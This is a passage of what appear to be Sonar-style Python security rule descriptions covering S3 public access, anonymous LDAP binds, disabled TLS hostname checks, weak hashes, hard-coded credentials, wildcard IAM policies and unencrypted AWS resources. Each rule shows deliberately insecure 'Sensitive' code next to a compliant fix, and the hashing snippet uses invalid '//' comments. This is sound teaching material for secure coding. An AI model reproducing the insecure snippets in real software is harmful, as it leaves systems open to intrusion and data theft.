bucket = s3.Bucket(self,
    "bucket",
    block_public_access=s3.BlockPublicAccess(
        block_public_acls=False,       # Sensitive
        ignore_public_acls=True,
        block_public_policy=True,
        restrict_public_buckets=True
    )
)

The attribute BLOCK_ACLS only blocks and ignores public ACLs:

bucket = s3.Bucket(self,
    "bucket",
    block_public_access=s3.BlockPublicAccess.BLOCK_ACLS     # Sensitive
)

Compliant Solution

This block_public_access blocks public ACLs and policies, ignores existing public ACLs and restricts existing public policies:

bucket = s3.Bucket(self,
    "bucket",
    block_public_access=s3.BlockPublicAccess.BLOCK_ALL # Compliant
)

A similar configuration to the one above can obtained by setting all parameters of the block_public_access

bucket = s3.Bucket(self, "bucket",
    block_public_access=s3.BlockPublicAccess(       # Compliant
        block_public_acls=True,
        ignore_public_acls=True,
        block_public_policy=True,
        restrict_public_buckets=True
    )
)

See

python:S2257

The use of a non-standard algorithm is dangerous because a determined attacker may be able to break the algorithm and compromise whatever data has been protected. Standard algorithms like Argon2PasswordHasher, BCryptPasswordHasher, …​ should be used instead.

This rule tracks creation of BasePasswordHasher subclasses for Django applications.

Recommended Secure Coding Practices

  • Use a standard algorithm instead of creating a custom one.

Sensitive Code Example

class CustomPasswordHasher(BasePasswordHasher):  # Sensitive
    # ...

See

python:S4433

Lightweight Directory Access Protocol (LDAP) servers provide two main authentication methods: the SASL and Simple ones. The Simple Authentication method also breaks down into three different mechanisms:

  • Anonymous Authentication
  • Unauthenticated Authentication
  • Name/Password Authentication

A server that accepts either the Anonymous or Unauthenticated mechanisms will accept connections from clients not providing credentials.

Why is this an issue?

When configured to accept the Anonymous or Unauthenticated authentication mechanism, an LDAP server will accept connections from clients that do not provide a password or other authentication credentials. Such users will be able to read or modify part or all of the data contained in the hosted directory.

What is the potential impact?

An attacker exploiting unauthenticated access to an LDAP server can access the data that is stored in the corresponding directory. The impact varies depending on the permission obtained on the directory and the type of data it stores.

Authentication bypass

If attackers get write access to the directory, they will be able to alter most of the data it stores. This might include sensitive technical data such as user passwords or asset configurations. Such an attack can typically lead to an authentication bypass on applications and systems that use the affected directory as an identity provider.

In such a case, all users configured in the directory might see their identity and privileges taken over.

Sensitive information leak

If attackers get read-only access to the directory, they will be able to read the data it stores. That data might include security-sensitive pieces of information.

Typically, attackers might get access to user account lists that they can use in further intrusion steps. For example, they could use such lists to perform password spraying, or related attacks, on all systems that rely on the affected directory as an identity provider.

If the directory contains some Personally Identifiable Information, an attacker accessing it might represent a violation of regulatory requirements in some countries. For example, this kind of security event would go against the European GDPR law.

How to fix it

Code examples

The following code indicates an anonymous LDAP authentication vulnerability because it binds to a remote server using an Anonymous Simple authentication mechanism.

Noncompliant code example

import ldap

def init_ldap():
   connect = ldap.initialize('ldap://example:1389')

   connect.simple_bind('cn=root') # Noncompliant
   connect.simple_bind_s('cn=root') # Noncompliant
   connect.bind_s('cn=root', None) # Noncompliant
   connect.bind('cn=root', None) # Noncompliant

Compliant solution

import ldap
import os

def init_ldap():
   connect = ldap.initialize('ldap://example:1389')

   connect.simple_bind('cn=root', os.environ.get('LDAP_PASSWORD'))
   connect.simple_bind_s('cn=root', os.environ.get('LDAP_PASSWORD'))
   connect.bind_s('cn=root', os.environ.get('LDAP_PASSWORD'))
   connect.bind('cn=root', os.environ.get('LDAP_PASSWORD'))

Resources

Documentation

Standards

python:S5527

This vulnerability allows attackers to impersonate a trusted host.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. In this process, the role of hostname validation, combined with certificate validation, is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When hostname validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

To do so, an attacker would obtain a valid certificate authenticating example.com, serve it using a different hostname, and the application code would still accept it.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable hostname validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate hostnames, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

How to fix it in Python Standard Library

Code examples

The following code contains examples of disabled hostname validation.

Certificate validation is not enabled by default when _create_unverified_context or _create_stdlib_context is used. It is recommended to use create_default_context, without explicitly setting check_hostname to False.
Doing so creates a secure context that validates both hostnames and certificates.

Noncompliant code example

import ssl

example = ssl._create_stdlib_context() # Noncompliant

example = ssl._create_default_https_context()
example.check_hostname = False # Noncompliant

Compliant solution

import ssl

example = ssl.create_default_context()

example = ssl._create_default_https_context()

How does this work?

To fix the vulnerability of disabled hostname validation, it is strongly recommended to first re-enable the default validation and fix the root cause: the validity of the certificate.

Use valid certificates

If a hostname validation failure prevents connecting to the target server, keep in mind that one system’s code should not work around another system’s problems, as this creates unnecessary dependencies and can lead to reliability issues.

Therefore, the first solution is to change the remote host’s certificate to match its identity. If the remote host is not under your control, consider replicating its service to a server whose certificate you can change yourself.

In case the contacted host is located on a development machine, and if there is no other choice, try following this solution:

  • Create a self-signed certificate for that machine.
  • Add this self-signed certificate to the system’s trust store.
  • If the hostname is not localhost, add the hostname in the /etc/hosts file.

Resources

Standards

python:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

Sensitive Code Example

import hashlib
m = hashlib.md5() // Sensitive
import hashlib
m = hashlib.sha1() // Sensitive
import md5 // Sensitive and deprecated since Python 2.5; use the hashlib module instead.
m = md5.new()

import sha // Sensitive and deprecated since Python 2.5; use the hashlib module instead.
m = sha.new()

Compliant Solution

import hashlib
m = hashlib.sha512() // Compliant

See

python:S4792

Configuring loggers is security-sensitive. It has led in the past to the following vulnerabilities:

Logs are useful before, during and after a security incident.

  • Attackers will most of the time start their nefarious work by probing the system for vulnerabilities. Monitoring this activity and stopping it is the first step to prevent an attack from ever happening.
  • In case of a successful attack, logs should contain enough information to understand what damage an attacker may have inflicted.

Logs are also a target for attackers because they might contain sensitive information. Configuring loggers has an impact on the type of information logged and how they are logged.

This rule flags for review code that initiates loggers configuration. The goal is to guide security code reviews.

Ask Yourself Whether

  • unauthorized users might have access to the logs, either because they are stored in an insecure location or because the application gives access to them.
  • the logs contain sensitive information on a production server. This can happen when the logger is in debug mode.
  • the log can grow without limit. This can happen when additional information is written into logs every time a user performs an action and the user can perform the action as many times as he/she wants.
  • the logs do not contain enough information to understand the damage an attacker might have inflicted. The loggers mode (info, warn, error) might filter out important information. They might not print contextual information like the precise time of events or the server hostname.
  • the logs are only stored locally instead of being backuped or replicated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Check that your production deployment doesn’t have its loggers in "debug" mode as it might write sensitive information in logs.
  • Production logs should be stored in a secure location which is only accessible to system administrators.
  • Configure the loggers to display all warnings, info and error messages. Write relevant information such as the precise time of events and the hostname.
  • Choose log format which is easy to parse and process automatically. It is important to process logs rapidly in case of an attack so that the impact is known and limited.
  • Check that the permissions of the log files are correct. If you index the logs in some other service, make sure that the transfer and the service are secure too.
  • Add limits to the size of the logs and make sure that no user can fill the disk with logs. This can happen even when the user does not control the logged information. An attacker could just repeat a logged action many times.

Remember that configuring loggers properly doesn’t make them bullet-proof. Here is a list of recommendations explaining on how to use your logs:

  • Don’t log any sensitive information. This obviously includes passwords and credit card numbers but also any personal information such as user names, locations, etc…​ Usually any information which is protected by law is good candidate for removal.
  • Sanitize all user inputs before writing them in the logs. This includes checking its size, content, encoding, syntax, etc…​ As for any user input, validate using whitelists whenever possible. Enabling users to write what they want in your logs can have many impacts. It could for example use all your storage space or compromise your log indexing service.
  • Log enough information to monitor suspicious activities and evaluate the impact an attacker might have on your systems. Register events such as failed logins, successful logins, server side input validation failures, access denials and any important transaction.
  • Monitor the logs for any suspicious activity.

Sensitive Code Example

import logging
from logging import Logger, Handler, Filter
from logging.config import fileConfig, dictConfig

logging.basicConfig()  # Sensitive

logging.disable()  # Sensitive


def update_logging(logger_class):
    logging.setLoggerClass(logger_class)  # Sensitive


def set_last_resort(last_resort):
    logging.lastResort = last_resort  # Sensitive


class CustomLogger(Logger):  # Sensitive
    pass


class CustomHandler(Handler):  # Sensitive
    pass


class CustomFilter(Filter):  # Sensitive
    pass


def update_config(path, config):
    fileConfig(path)  # Sensitive
    dictConfig(config)  # Sensitive

See

python:S6304

A policy that allows identities to access all resources in an AWS account may violate the principle of least privilege. Suppose an identity has permission to access all resources even though it only requires access to some non-sensitive ones. In this case, unauthorized access and disclosure of sensitive information will occur.

Ask Yourself Whether

The AWS account has more than one resource with different levels of sensitivity.

A risk exists if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e., by only granting access to necessary resources. A good practice to achieve this is to organize or tag resources depending on the sensitivity level of data they store or process. Therefore, managing a secure access control is less prone to errors.

Sensitive Code Example

The wildcard "*" is specified as the resource for this PolicyStatement. This grants the update permission for all policies of the account:

from aws_cdk.aws_iam import Effect, PolicyDocument, PolicyStatement

PolicyDocument(
    statements=[
        PolicyStatement(
            effect=Effect.ALLOW,
            actions="iam:CreatePolicyVersion",
            resources=["*"] # Sensitive
        )
    ]
)

Compliant Solution

Restrict the update permission to the appropriate subset of policies:

from aws_cdk import Aws
from aws_cdk.aws_iam import Effect, PolicyDocument, PolicyStatement

PolicyDocument(
    statements=[
        PolicyStatement(
            effect=Effect.ALLOW,
            actions="iam:CreatePolicyVersion",
            resources=[f"arn:aws:iam::{Aws.ACCOUNT_ID}:policy/team1/*"]
        )
    ]
)

Exceptions

  • Should not be raised on key policies (when AWS KMS actions are used.)
  • Should not be raised on policies not using any resources (if and only if all actions in the policy never require resources.)

See

python:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

url = "http://example.com" # Sensitive
url = "ftp://anonymous@example.com" # Sensitive
url = "telnet://anonymous@example.com" # Sensitive

import telnetlib
cnx = telnetlib.Telnet("towel.blinkenlights.nl") # Sensitive

import ftplib
cnx = ftplib.FTP("ftp.example.com") # Sensitive

import smtplib
smtp = smtplib.SMTP("smtp.example.com", port=587) # Sensitive

For aws_cdk.aws_elasticloadbalancingv2.ApplicationLoadBalancer:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)

lb = elbv2.ApplicationLoadBalancer(
    self,
    "LB",
    vpc=vpc,
    internet_facing=True
)

lb.add_listener(
    "Listener-default",
    port=80, # Sensitive
    open=True
)
lb.add_listener(
    "Listener-http-explicit",
    protocol=elbv2.ApplicationProtocol.HTTP, # Sensitive
    port=8080,
    open=True
)

For aws_cdk.aws_elasticloadbalancingv2.ApplicationListener:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)

elbv2.ApplicationListener(
    self,
    "listener-http-explicit-const",
    load_balancer=lb,
    protocol=elbv2.ApplicationProtocol.HTTP, # Sensitive
    port=8081,
    open=True
)

For aws_cdk.aws_elasticloadbalancingv2.NetworkLoadBalancer:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)
lb = elbv2.NetworkLoadBalancer(
    self,
    "LB",
    vpc=vpc,
    internet_facing=True
)

lb.add_listener( # Sensitive
    "Listener-default",
    port=1234
)
lb.add_listener(
    "Listener-TCP-explicit",
    protocol=elbv2.Protocol.TCP, # Sensitive
    port=1337
)

For aws_cdk.aws_elasticloadbalancingv2.NetworkListener:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)

elbv2.NetworkListener(
    self,
    "Listener-TCP-explicit",
    protocol=elbv2.Protocol.TCP, # Sensitive
    port=1338,
    load_balancer=lb
)

For aws_cdk.aws_elasticloadbalancingv2.CfnListener:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)

elbv2.CfnListener(
    self,
    "listener-http",
    default_actions=[application_default_action],
    load_balancer_arn=lb.load_balancer_arn,
    protocol="HTTP", # Sensitive
    port=80
)

elbv2.CfnListener(
    self,
    "listener-tcp",
    default_actions=[network_default_action],
    load_balancer_arn=lb.load_balancer_arn,
    protocol="TCP", # Sensitive
    port=1000
)

For aws_cdk.aws_elasticloadbalancing.LoadBalancerListener:

from aws_cdk import (
    aws_elasticloadbalancing as elb,
)

elb.LoadBalancerListener(
    external_port=10000,
    external_protocol=elb.LoadBalancingProtocol.TCP, # Sensitive
    internal_port=10000
)

elb.LoadBalancerListener(
    external_port=10080,
    external_protocol=elb.LoadBalancingProtocol.HTTP, # Sensitive
    internal_port=10080
)

For aws_cdk.aws_elasticloadbalancing.CfnLoadBalancer:

from aws_cdk import (
    aws_elasticloadbalancing as elb
)

elb.CfnLoadBalancer(
    self,
    "elb-tcp",
    listeners=[
        elb.CfnLoadBalancer.ListenersProperty(
            instance_port="10000",
            load_balancer_port="10000",
            protocol="tcp" # Sensitive
        )
    ],
    subnets=vpc.select_subnets().subnet_ids
)

elb.CfnLoadBalancer(
    self,
    "elb-http-dict",
    listeners=[
        {
            "instancePort":"10000",
            "loadBalancerPort":"10000",
            "protocol":"http" # Sensitive
        }
    ],
    subnets=vpc.select_subnets().subnet_ids
)

For aws_cdk.aws_elasticloadbalancing.LoadBalancer:

from aws_cdk import (
    aws_elasticloadbalancing as elb,
)

elb.LoadBalancer(
    self,
    "elb-tcp-dict",
    vpc=vpc,
    listeners=[
        {
            "externalPort":10000,
            "externalProtocol":elb.LoadBalancingProtocol.TCP, # Sensitive
            "internalPort":10000
        }
    ]
)

loadBalancer.add_listener(
    external_port=10081,
    external_protocol=elb.LoadBalancingProtocol.HTTP, # Sensitive
    internal_port=10081
)
loadBalancer.add_listener(
    external_port=10001,
    external_protocol=elb.LoadBalancingProtocol.TCP, # Sensitive
    internal_port=10001
)

For aws_cdk.aws_elasticache.CfnReplicationGroup:

from aws_cdk import (
    aws_elasticache as elasticache
)

elasticache.CfnReplicationGroup(
    self,
    "unencrypted-explicit",
    replication_group_description="a replication group",
    automatic_failover_enabled=False,
    transit_encryption_enabled=False, # Sensitive
    cache_subnet_group_name="test",
    engine="redis",
    engine_version="3.2.6",
    num_cache_clusters=1,
    cache_node_type="cache.t2.micro"
)

elasticache.CfnReplicationGroup( # Sensitive, encryption is disabled by default
    self,
    "unencrypted-implicit",
    replication_group_description="a test replication group",
    automatic_failover_enabled=False,
    cache_subnet_group_name="test",
    engine="redis",
    engine_version="3.2.6",
    num_cache_clusters=1,
    cache_node_type="cache.t2.micro"
)

For aws_cdk.aws_kinesis.CfnStream:

from aws_cdk import (
    aws_kinesis as kinesis,
)

kinesis.CfnStream( # Sensitive, encryption is disabled by default for CfnStreams
    self,
    "cfnstream-implicit-unencrytped",
    shard_count=1
)

kinesis.CfnStream(self,
    "cfnstream-explicit-unencrytped",
    shard_count=1,
    stream_encryption=None # Sensitive
)

For aws_cdk.aws_kinesis.Stream:

from aws_cdk import (
    aws_kinesis as kinesis,
)

stream = kinesis.Stream(self,
    "stream-explicit-unencrypted",
    shard_count=1,
    encryption=kinesis.StreamEncryption.UNENCRYPTED # Sensitive
)

Compliant Solution

url = "https://example.com"
url = "sftp://anonymous@example.com"
url = "ssh://anonymous@example.com"

import ftplib
cnx = ftplib.FTP_TLS("ftp.example.com")

import smtplib
smtp = smtplib.SMTP("smtp.example.com", port=587)
smtp.starttls(context=context)

smtp_ssl = smtplib.SMTP_SSL("smtp.gmail.com", port=465)

For aws_cdk.aws_elasticloadbalancingv2.ApplicationLoadBalancer:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)

lb = elbv2.ApplicationLoadBalancer(
    self,
    "LB",
    vpc=vpc,
    internet_facing=True
)

lb.add_listener(
    "Listener-https-explicit",
    protocol=elbv2.ApplicationProtocol.HTTPS,
    certificates=[elbv2.ListenerCertificate("certificateARN")],
    port=443,
    open=True
)

lb.add_listener(
    "Listener-https-implicit",
    certificates=[elbv2.ListenerCertificate("certificateARN")],
    port=8443,
    open=True
)

For aws_cdk.aws_elasticloadbalancingv2.ApplicationListener:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)

elbv2.ApplicationListener(
    self,
    "listener-https-explicit-const",
    load_balancer=lb,
    protocol=elbv2.ApplicationProtocol.HTTPS,
    certificates=[elbv2.ListenerCertificate("certificateARN")],
    port=444,
    open=True
)

For aws_cdk.aws_elasticloadbalancingv2.NetworkLoadBalancer:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)
lb = elbv2.NetworkLoadBalancer(
    self,
    "LB",
    vpc=vpc,
    internet_facing=True
)

lb.add_listener(
    "Listener-TLS-explicit",
    protocol=elbv2.Protocol.TLS,
    certificates=[elbv2.ListenerCertificate("certificateARN")],
    port=443
)
lb.add_listener(
    "Listener-TLS-implicit",
    certificates=[elbv2.ListenerCertificate("certificateARN")],
    port=1024
)

For aws_cdk.aws_elasticloadbalancingv2.NetworkListener:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)

elbv2.NetworkListener(
    self,
    "Listener-TLS-explicit",
    protocol=elbv2.Protocol.TLS,
    certificates=[elbv2.ListenerCertificate("certificateARN")],
    port=443,
    load_balancer=lb
)

For aws_cdk.aws_elasticloadbalancingv2.CfnListener:

from aws_cdk import (
    aws_elasticloadbalancingv2 as elbv2,
)

elbv2.CfnListener(
    self,
    "listener-https",
    default_actions=[application_default_action],
    load_balancer_arn=lb.load_balancer_arn,
    protocol="HTTPS",
    port=443,
    certificates=[elbv2.CfnListener.CertificateProperty(
        certificate_arn="certificateARN"
    )]
)

elbv2.CfnListener(
    self,
    "listener-tls",
    default_actions=[network_default_action],
    load_balancer_arn=lb.load_balancer_arn,
    protocol="TLS",
    port=1001,
    certificates=[elbv2.CfnListener.CertificateProperty(
        certificate_arn="certificateARN"
    )]
)

For aws_cdk.aws_elasticloadbalancing.LoadBalancerListener:

from aws_cdk import (
    aws_elasticloadbalancing as elb,
)

elb.LoadBalancerListener(
    external_port=10043,
    external_protocol=elb.LoadBalancingProtocol.SSL,
    internal_port=10043,
    ssl_certificate_arn="certificateARN"
)

elb.LoadBalancerListener(
    external_port=10443,
    external_protocol=elb.LoadBalancingProtocol.HTTPS,
    internal_port=10443,
    ssl_certificate_arn="certificateARN"
)

For aws_cdk.aws_elasticloadbalancing.CfnLoadBalancer:

from aws_cdk import (
    aws_elasticloadbalancing as elb,
)

elb.CfnLoadBalancer(
    self,
    "elb-ssl",
    listeners=[
        elb.CfnLoadBalancer.ListenersProperty(
            instance_port="10043",
            load_balancer_port="10043",
            protocol="ssl",
            ssl_certificate_id=CERTIFICATE_ARN
        )
    ],
    subnets=vpc.select_subnets().subnet_ids
)

elb.CfnLoadBalancer(
    self,
    "elb-https-dict",
    listeners=[
        {
            "instancePort":"10443",
            "loadBalancerPort":"10443",
            "protocol":"https",
            "sslCertificateId":CERTIFICATE_ARN
        }
    ],
    subnets=vpc.select_subnets().subnet_ids
)

For aws_cdk.aws_elasticloadbalancing.LoadBalancer:

from aws_cdk import (
    aws_elasticloadbalancing as elb,
)

elb.LoadBalancer(
    self,
    "elb-ssl",
    vpc=vpc,
    listeners=[
        {
            "externalPort":10044,
            "externalProtocol":elb.LoadBalancingProtocol.SSL,
            "internalPort":10044,
            "sslCertificateArn":"certificateARN"
        },
        {
            "externalPort":10444,
            "externalProtocol":elb.LoadBalancingProtocol.HTTPS,
            "internalPort":10444,
            "sslCertificateArn":"certificateARN"
        }
    ]
)

loadBalancer = elb.LoadBalancer(
        self,
        "elb-multi-listener",
        vpc=vpc
)
loadBalancer.add_listener(
    external_port=10045,
    external_protocol=elb.LoadBalancingProtocol.SSL,
    internal_port=10045,
    ssl_certificate_arn="certificateARN"
)
loadBalancer.add_listener(
    external_port=10445,
    external_protocol=elb.LoadBalancingProtocol.HTTPS,
    internal_port=10445,
    ssl_certificate_arn="certificateARN"
)

For aws_cdk.aws_elasticache.CfnReplicationGroup:

from aws_cdk import (
    aws_elasticache as elasticache
)

elasticache.CfnReplicationGroup(
    self,
    "encrypted-explicit",
    replication_group_description="a test replication group",
    automatic_failover_enabled=False,
    transit_encryption_enabled=True,
    cache_subnet_group_name="test",
    engine="redis",
    engine_version="3.2.6",
    num_cache_clusters=1,
    cache_node_type="cache.t2.micro"
)

For aws_cdk.aws_kinesis.CfnStream:

from aws_cdk import (
    aws_kinesis as kinesis,
)

kinesis.CfnStream(
    self,
    "cfnstream-explicit-encrytped",
    shard_count=1,
    stream_encryption=kinesis.CfnStream.StreamEncryptionProperty(
        encryption_type="KMS",
        key_id="alias/aws/kinesis"
    )
)

stream = kinesis.CfnStream(
    self,
    "cfnstream-explicit-encrytped-dict",
    shard_count=1,
    stream_encryption={
        "encryptionType": "KMS",
        "keyId": "alias/aws/kinesis"
    }
)

For aws_cdk.aws_kinesis.Stream:

from aws_cdk import (
    aws_kinesis as kinesis,
    aws_kms as kms
)

stream = kinesis.Stream( # Encryption is enabled by default for Streams
    self,
    "stream-implicit-encrypted",
    shard_count=1
)

stream = kinesis.Stream(
    self,
    "stream-explicit-encrypted-managed",
    shard_count=1,
    encryption=kinesis.StreamEncryption.MANAGED
)

key = kms.Key(self, "managed_key")
stream = kinesis.Stream(
    self,
    "stream-explicit-encrypted-selfmanaged",
    shard_count=1,
    encryption=kinesis.StreamEncryption.KMS,
    encryption_key=key
)

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

python:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

username = 'admin'
password = 'admin' # Sensitive
usernamePassword = 'user=admin&password=admin' # Sensitive

Compliant Solution

import os

username = os.getenv("username") # Compliant
password = os.getenv("password") # Compliant
usernamePassword = 'user=%s&password=%s' % (username, password) # Compliant{code}

See

python:S6303

Using unencrypted RDS DB resources exposes data to unauthorized access.
This includes database data, logs, automatic backups, read replicas, snapshots, and cluster metadata.

This situation can occur in a variety of scenarios, such as:

  • A malicious insider working at the cloud provider gains physical access to the storage device.
  • Unknown attackers penetrate the cloud provider’s logical infrastructure and systems.

After a successful intrusion, the underlying applications are exposed to:

  • theft of intellectual property and/or personal data
  • extortion
  • denial of services and security bypasses via data corruption or deletion

AWS-managed encryption at rest reduces this risk with a simple switch.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to enable encryption at rest on any RDS DB resource, regardless of the engine.
In any case, no further maintenance is required as encryption at rest is fully managed by AWS.

Sensitive Code Example

For aws_cdk.aws_rds.DatabaseCluster and aws_cdk.aws_rds.DatabaseInstance:

from aws_cdk import (
    aws_rds as rds
)

class DatabaseStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        rds.DatabaseCluster( # Sensitive, unencrypted by default
            self,
            "example"
        )

For aws_cdk.aws_rds.CfnDBCluster and aws_cdk.aws_rds.CfnDBInstance:

from aws_cdk import (
    aws_rds as rds
)

class DatabaseStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        rds.CfnDBCluster( # Sensitive, unencrypted by default
            self,
            "example"
        )

Compliant Solution

For aws_cdk.aws_rds.DatabaseCluster and aws_cdk.aws_rds.DatabaseInstance:

from aws_cdk import (
    aws_rds as rds
)

class DatabaseStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        rds.DatabaseCluster(
            self,
            "example",
            storage_encrypted=True
        )

For aws_cdk.aws_rds.CfnDBCluster and aws_cdk.aws_rds.CfnDBInstance:

from aws_cdk import (
    aws_rds as rds
)

class DatabaseStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        rds.CfnDBCluster(
            self,
            "example",
            storage_encrypted=True
        )

See

python:S6302

A policy that grants all permissions may indicate an improper access control, which violates the principle of least privilege. Suppose an identity is granted full permissions to a resource even though it only requires read permission to work as expected. In this case, an unintentional overwriting of resources may occur and therefore result in loss of information.

Ask Yourself Whether

Identities obtaining all the permissions:

  • only require a subset of these permissions to perform the intended function.
  • have monitored activity showing that only a subset of these permissions is actually used.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e. by only granting the necessary permissions to identities. A good practice is to start with the very minimum set of permissions and to refine the policy over time. In order to fix overly permissive policies already deployed in production, a strategy could be to review the monitored activity in order to reduce the set of permissions to those most used.

Sensitive Code Example

A customer-managed policy that grants all permissions by using the wildcard (*) in the Action property:

from aws_cdk.aws_iam import PolicyStatement, Effect

PolicyStatement(
    effect=Effect.ALLOW,
    actions=["*"], # Sensitive
    resources=["arn:aws:iam:::user/*"]
)

Compliant Solution

A customer-managed policy that grants only the required permissions:

from aws_cdk.aws_iam import PolicyStatement, Effect

PolicyStatement(
    effect=Effect.ALLOW,
    actions=["iam:GetAccountSummary"],
    resources=["arn:aws:iam:::user/*"]
)

See

python:S6308

Amazon OpenSearch Service is a managed service to host OpenSearch instances. It replaces Elasticsearch Service, which has been deprecated.

To harden domain (cluster) data in case of unauthorized access, OpenSearch provides data-at-rest encryption if the engine is OpenSearch (any version), or Elasticsearch with a version of 5.1 or above. Enabling encryption at rest will help protect:

  • indices
  • logs
  • swap files
  • data in the application directory
  • automated snapshots

Thus, adversaries cannot access the data if they gain physical access to the storage medium.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to encrypt OpenSearch domains that contain sensitive information.

OpenSearch handles encryption and decryption transparently, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_cdk.aws_opensearchservice.Domain:

from aws_cdk.aws_opensearchservice import Domain, EngineVersion

class DomainStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)

        Domain(self, "Sensitive",
            version=EngineVersion.OPENSEARCH_1_3
        ) # Sensitive, encryption is disabled by default

For aws_cdk.aws_opensearchservice.CfnDomain:

from aws_cdk.aws_opensearchservice import CfnDomain

class CfnDomainStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)

        CfnDomain(self, "Sensitive") # Sensitive, encryption is disabled by default

Compliant Solution

For aws_cdk.aws_opensearchservice.Domain:

from aws_cdk.aws_opensearchservice import Domain, EncryptionAtRestOptions, EngineVersion

class DomainStack(Stack):
